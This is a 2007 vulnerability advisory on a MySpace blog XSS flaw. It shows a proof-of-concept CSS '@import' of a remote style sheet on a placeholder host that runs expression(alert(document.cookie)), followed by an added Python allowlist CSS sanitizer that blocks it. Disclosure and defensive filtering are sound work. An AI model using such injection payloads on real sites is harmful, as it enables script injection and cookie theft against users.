[Advisory] MySpace blog XSS vulnerability
by luoluo (luoluonet_at_hotmail.com||luoluonet_at_126.com)
http://www.ph4nt0m.org
2007-3-24
- description
There is an XSS vulnerability in the customize page of the MySpace blog.
A user can submit HTML and CSS in this page; script is filtered, but the CSS keyword
"@import" is not. So we can inject script by importing a CSS file remotely.
- poc
Head HTML textarea:
<div id="test">aaa</div>
Custom Style Sheet:
@import url(http://www.yoursite.com/test.css);
test.css:
#test {width: expression(alert(document.cookie));}
- solution
Filter the CSS keyword "@import", but the XSS blacklist will never reach the end :)
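An allowlist-based check is the usual way out of the blacklist problem the solution describes: rebuild the user's style sheet only from properties and values that are known to be safe, so both the "@import" line and the imported expression() rule from the PoC are dropped without naming either. This is an added illustration, not code from the advisory or from MySpace; the property allowlist and the benign sample are assumptions.

```python
import re

# Property allowlist: an assumption for this example, not MySpace's actual list.
ALLOWED_PROPERTIES = {
    "color", "background-color", "font-size", "font-family", "font-weight",
    "width", "height", "margin", "padding", "border", "text-align",
}
# Values may hold words, digits, units, hex colours and commas, but never
# parentheses or quotes, so expression(...) and url(...) cannot pass.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9#%.,\s-]+$")
# Any at-rule, with or without a block: dropped whole, @import included.
AT_RULE = re.compile(r"@[^;{]*(?:;|\{[^}]*\})")
# A flat "selector { declarations }" rule.
RULE = re.compile(r"([^{}@]+)\{([^{}]*)\}")

def sanitize_css(css):
    """Return (clean_css, rejected): output is rebuilt only from pieces that
    passed the allowlist, so anything unrecognised is dropped, not patched."""
    rejected = [m.strip() for m in AT_RULE.findall(css)]
    kept_rules = []
    for selector, body in RULE.findall(AT_RULE.sub("", css)):
        decls = []
        for decl in body.split(";"):
            if ":" not in decl:
                continue
            prop, value = (part.strip() for part in decl.split(":", 1))
            if prop.lower() in ALLOWED_PROPERTIES and SAFE_VALUE.match(value):
                decls.append(f"{prop}: {value}")
            else:
                rejected.append(f"{prop}: {value}")
        if decls:
            kept_rules.append(f"{selector.strip()} {{ {'; '.join(decls)}; }}")
    return "\n".join(kept_rules), rejected

# The advisory's PoC style sheet (@import plus the imported expression() rule).
POC_STYLE_SHEET = (
    "@import url(http://www.yoursite.com/test.css);\n"
    "#test {width: expression(alert(document.cookie));}"
)
# A constructed benign style sheet that a user could legitimately submit.
BENIGN_STYLE_SHEET = "#test {width: 100px; color: #ff0000}"

if __name__ == "__main__":
    for sheet in (POC_STYLE_SHEET, BENIGN_STYLE_SHEET):
        clean, rejected = sanitize_css(sheet)
        print("kept:", clean or "(nothing)", "| rejected:", rejected)
```

Nested at-rule blocks are not parsed; whatever the flat grammar does not recognise simply never reaches the output.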